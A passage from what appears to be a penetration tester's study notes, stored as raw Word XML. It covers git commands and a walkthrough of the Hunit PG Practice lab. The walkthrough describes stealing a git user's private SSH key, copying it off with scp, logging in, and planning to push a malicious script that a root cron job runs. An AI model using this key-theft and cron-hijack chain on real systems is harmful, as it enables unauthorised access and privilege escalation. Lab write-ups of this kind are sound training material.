      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the Relia Writeup for more in-depth information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git show 8b430c17c16e6c0515e49c4eafdd129f719fde74 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is like git log and git show combined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003200">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows all the logs and also all the changes between each log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then scroll through the output, since it's a lot of output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003202">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003203">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l5e9mw89uuuk" w:id="445"/>
      <w:bookmarkEnd w:id="445"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Really complex git example </w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A really complex example of git was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hunit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They cloned a local git repo instead of a remote git repo. The local git repo was a bare Git repository (basically the backend database of Git). Bare repos don’t have a working copy of the files — they just store Git objects, refs, and history.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003207">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we had to clone local repo in order to see the files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003208">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they set up git identity by using git config and putting in username and email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003209">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they had to login to another user named git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then they had permissions to commit and push the change back into the server’s bare repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They ran git add and git push</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And the cron job ran the malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000320F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a summary of the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003210">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003211">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Local Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003212">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running LinPEAS showed a suspicious cronjob owned by root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003213">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This cronjob executed two scripts (pull.sh every 2 minutes and backups.sh every 3 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003214">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scripts were stored in a Git repository (/git-server), and the cronjob was pulling updates from that repo before running them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003215">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003216">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Git Repository Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003217">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The directory /git-server turned out to be a bare Git repo (not a normal working folder).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003218">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bare repos don’t have files you can directly edit; instead, they’re like databases that store Git history and are meant to be pushed/pulled from.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="808"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To work with it, the attacker cloned it locally using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="808"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone file:///git-server/ /tmp/git-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="808"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This created a normal working directory with the tracked files, including backups.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Initial Modification Attempts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker added a harmless line (touch /tmp/gitscript-test) to backups.sh and committed it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000321F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But when they tried to push the change back to /git-server, it failed — they didn’t have the right permissions as their current user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003220">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003221">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lateral Movement to git User</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003222">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While exploring further, they found /home/git/.ssh/id_rsa, the private SSH key for the git user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003223">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it had read permissions, they exfiltrated it to their Kali machine with scp, fixed the permissions (chmod 600 id_rsa), and logged in as git:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003224">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa -p 43022 git@192.168.93.125</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003225">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="818"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This dropped them into a git-shell, a restricted shell designed for Git-only interaction (push, pull, clone).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003226">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003227">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Repo Access as git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003228">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now authenticated as git, they could properly interact with the /git-server repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003229">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They cloned it again, but this time using the git user and SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000322A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="970"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
